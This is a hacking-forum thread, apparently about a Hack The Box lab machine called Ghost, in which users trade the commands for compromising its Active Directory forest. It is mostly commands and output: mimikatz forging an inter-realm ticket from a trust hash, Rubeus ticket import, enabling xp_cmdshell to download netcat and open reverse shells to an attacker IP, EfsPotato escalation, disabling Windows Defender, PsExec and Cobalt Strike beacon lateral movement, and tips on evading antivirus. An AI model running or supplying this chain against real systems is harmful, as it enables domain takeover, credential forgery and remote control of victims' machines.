Possibly Related Threads…

floridaman389 · 07-18-2024, 09:15 AM

(07-17-2024, 09:16 PM)mazafaka555 Wrote:
(07-17-2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi User : blahblah Domain : CORP.GHOST.HTB (CORP) SID : S-1-5-21-2034262909-2733679486-000000000 User Id : 500 Groups Id : *513 512 520 518 519 Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ; ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt Service : krbtgt Target : GHOST.HTB Lifetime : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM -> Ticket : golden_trust.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # exit Bye! [*] PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*]Action: Ask TGS [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb' [*]Using domain controller: DC01.ghost.htb (10.10.11.24) [+] TGS request successful! [+] Ticket successfully imported! [*]base64(ticket.kirbi): doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg== ServiceName : cifs/DC01.ghost.htb ServiceRealm : GHOST.HTB UserName : blahblah UserRealm : CORP.GHOST.HTB StartTime : 7/17/2024 5:53:37 AM EndTime : 7/17/2024 3:53:37 PM RenewTill : 7/24/2024 5:53:37 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8= PS C:\tmp> ls \\dc01.ghost.htb\C$ [*] Directory: \\dc01.ghost.htb\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 2/2/2024 8:17 PM Program Files d----- 2/2/2024 8:16 PM Program Files (x86) d-r--- 2/4/2024 1:48 PM Users d----- 7/10/2024 3:08 AM Windows
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

[*]

Thank you for clarifying that! I was losing my hair over it LOL
[*]How could I go from accessing `dc01.ghost.htb` via smb to opening up a shell?

I tried PsExec, but didnt workout. and I dont have cobalt strike :/

puniaileman · 07-18-2024, 10:04 AM

[-] ERROR(DC01): Line 1: Could not find stored procedure 'enum_links'.

Already add host but ?

Axura · 07-18-2024, 01:14 PM

(07-18-2024, 09:15 AM)floridaman389 Wrote:
(07-17-2024, 09:16 PM)mazafaka555 Wrote:
(07-17-2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi User : blahblah Domain : CORP.GHOST.HTB (CORP) SID : S-1-5-21-2034262909-2733679486-000000000 User Id : 500 Groups Id : *513 512 520 518 519 Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ; ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt Service : krbtgt Target : GHOST.HTB Lifetime : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM -> Ticket : golden_trust.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # exit Bye! [*] PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*]Action: Ask TGS [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb' [*]Using domain controller: DC01.ghost.htb (10.10.11.24) [+] TGS request successful! [+] Ticket successfully imported! [*]base64(ticket.kirbi): doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg== ServiceName : cifs/DC01.ghost.htb ServiceRealm : GHOST.HTB UserName : blahblah UserRealm : CORP.GHOST.HTB StartTime : 7/17/2024 5:53:37 AM EndTime : 7/17/2024 3:53:37 PM RenewTill : 7/24/2024 5:53:37 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8= PS C:\tmp> ls \\dc01.ghost.htb\C$ [*] Directory: \\dc01.ghost.htb\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 2/2/2024 8:17 PM Program Files d----- 2/2/2024 8:16 PM Program Files (x86) d-r--- 2/4/2024 1:48 PM Users d----- 7/10/2024 3:08 AM Windows
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

[*]

Thank you for clarifying that! I was losing my hair over it LOL
[*]How could I go from accessing `dc01.ghost.htb` via smb to opening up a shell?

I tried PsExec, but didnt workout. and I dont have cobalt strike :/

copy nc.exe \\DC01.ghost.htb\c$\Windows\Temp\
.\PsExec64.exe \\DC01.ghost.htb cmd.exe /c "C:\Windows\Temp\nc.exe -e powershell <ip> <port>"

mazafaka555 · 07-18-2024, 01:15 PM

(07-18-2024, 03:28 AM)fuliye Wrote:
(07-17-2024, 09:16 PM)mazafaka555 Wrote:
(07-17-2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi User : blahblah Domain : CORP.GHOST.HTB (CORP) SID : S-1-5-21-2034262909-2733679486-000000000 User Id : 500 Groups Id : *513 512 520 518 519 Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ; ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt Service : krbtgt Target : GHOST.HTB Lifetime : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM -> Ticket : golden_trust.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # exit Bye! [*] PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*]Action: Ask TGS [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb' [*]Using domain controller: DC01.ghost.htb (10.10.11.24) [+] TGS request successful! [+] Ticket successfully imported! [*]base64(ticket.kirbi): doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg== ServiceName : cifs/DC01.ghost.htb ServiceRealm : GHOST.HTB UserName : blahblah UserRealm : CORP.GHOST.HTB StartTime : 7/17/2024 5:53:37 AM EndTime : 7/17/2024 3:53:37 PM RenewTill : 7/24/2024 5:53:37 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8= PS C:\tmp> ls \\dc01.ghost.htb\C$ [*] Directory: \\dc01.ghost.htb\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 2/2/2024 8:17 PM Program Files d----- 2/2/2024 8:16 PM Program Files (x86) d-r--- 2/4/2024 1:48 PM Users d----- 7/10/2024 3:08 AM Windows
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

wtf,man , why can you jump , i can't jump,please show the command T_T

[*]first of all, make sure that your raw payload (non-crypted) actually bypasses Win Defender.. then you can utilize usual techniques for lateral movement. like `jump psexec64` or remote-exec and so on..
[*]https://mvc1009.github.io/hackingnotes/red-team/lateral-movement/

[*]if all of these still doesn't work for you, for some reasons... you can still use PsExec from Sysinternals suit, which won't be flagged by any AV product.
[*]make sure you have a correct ticket first & then:
[*]

beacon> dir \\DC01.ghost.htb\C$\Users\Administrator\Desktop

[*]beacon> cd \\dc01.ghost.htb\c$\ProgramData

 beacon> upload /home/kali/htb/machines/ghost/drop/smb-loader.exe

[*]beacon> run .\PsExec.exe \\DC01.ghost.htb "c:\programdata\smb-loader.exe"

PsExec v2.43 - Execute processes remotely

Copyright (C) 2001-2023 Mark Russinovich

Sysinternals - www.sysinternals.com

Connecting to DC01.ghost.htb...Starting PSEXESVC service on DC01.ghost.htb...

Copying authentication key to DC01.ghost.htb...Connecting with PsExec service on DC01.ghost.htb...

Starting c:\programdata\smb-loader.exe on DC01.ghost.htb...

beacon> link DC01.ghost.htb msagent_0d

[*]Tasked to link to \\DC01.ghost.htb\pipe\msagent_0d

 [+] host called home, sent: 41 bytes

 [+] established link to child beacon: 10.0.0.254

 beacon> getuid

[*]You are CORP\Administrator (admin)

SoloMirai · (This post was last modified: 07-18-2024, 02:43 PM by SoloMirai.)

(07-16-2024, 05:35 AM)princecyber Wrote: First Phase:
impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@Ghost.htb -windows-auth
enum_links
use_link [PRIMARY]
use master
exec_as_login sa
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.x.x/nc64.exe -OutFile $env:TEMP\nc.exe"';
EXEC xp_cmdshell '%TEMP%\nc.exe -e cmd.exe 10.10.x.x 4444';

second Phase:
https://github.com/zcgonvh/EfsPotato (donwload efspotato.cs file) which will help to gain privilege escalation.
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
download nc.exe which is not triggered by av in any folder like documents or downloads
./EfsPotato.exe 'nc.exe -e cmd.exe 10.10.x.x 5555' (give admin shell)

third Phase: (disabling AV and getting acess to DC)
Set-MpPreference -DisableRealtimeMonitoring $true
.\mimikatz "lsadump::trust /patch" exit
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
type \\DC01.ghost.htb\c$\Users\justin.bradley\Desktop\user.txt
type \\DC01.ghost.htb\c$\Users\Administrator\Desktop\root.txt

Thanks for the guide, it is very detailed, but it only works if someone has already disabled defender, otherwise it will delete the NC binaries. In my case I uploaded my own shell for powershell to trick the AV Wink

floridaman389 · 07-18-2024, 02:44 PM

(07-18-2024, 01:14 PM)Axura Wrote:
(07-18-2024, 09:15 AM)floridaman389 Wrote:
(07-17-2024, 09:16 PM)mazafaka555 Wrote:
(07-17-2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi User : blahblah Domain : CORP.GHOST.HTB (CORP) SID : S-1-5-21-2034262909-2733679486-000000000 User Id : 500 Groups Id : *513 512 520 518 519 Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ; ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt Service : krbtgt Target : GHOST.HTB Lifetime : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM -> Ticket : golden_trust.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # exit Bye! [*] PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*]Action: Ask TGS [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb' [*]Using domain controller: DC01.ghost.htb (10.10.11.24) [+] TGS request successful! [+] Ticket successfully imported! [*]base64(ticket.kirbi): doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg== ServiceName : cifs/DC01.ghost.htb ServiceRealm : GHOST.HTB UserName : blahblah UserRealm : CORP.GHOST.HTB StartTime : 7/17/2024 5:53:37 AM EndTime : 7/17/2024 3:53:37 PM RenewTill : 7/24/2024 5:53:37 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8= PS C:\tmp> ls \\dc01.ghost.htb\C$ [*] Directory: \\dc01.ghost.htb\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 2/2/2024 8:17 PM Program Files d----- 2/2/2024 8:16 PM Program Files (x86) d-r--- 2/4/2024 1:48 PM Users d----- 7/10/2024 3:08 AM Windows
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

[*]

Thank you for clarifying that! I was losing my hair over it LOL
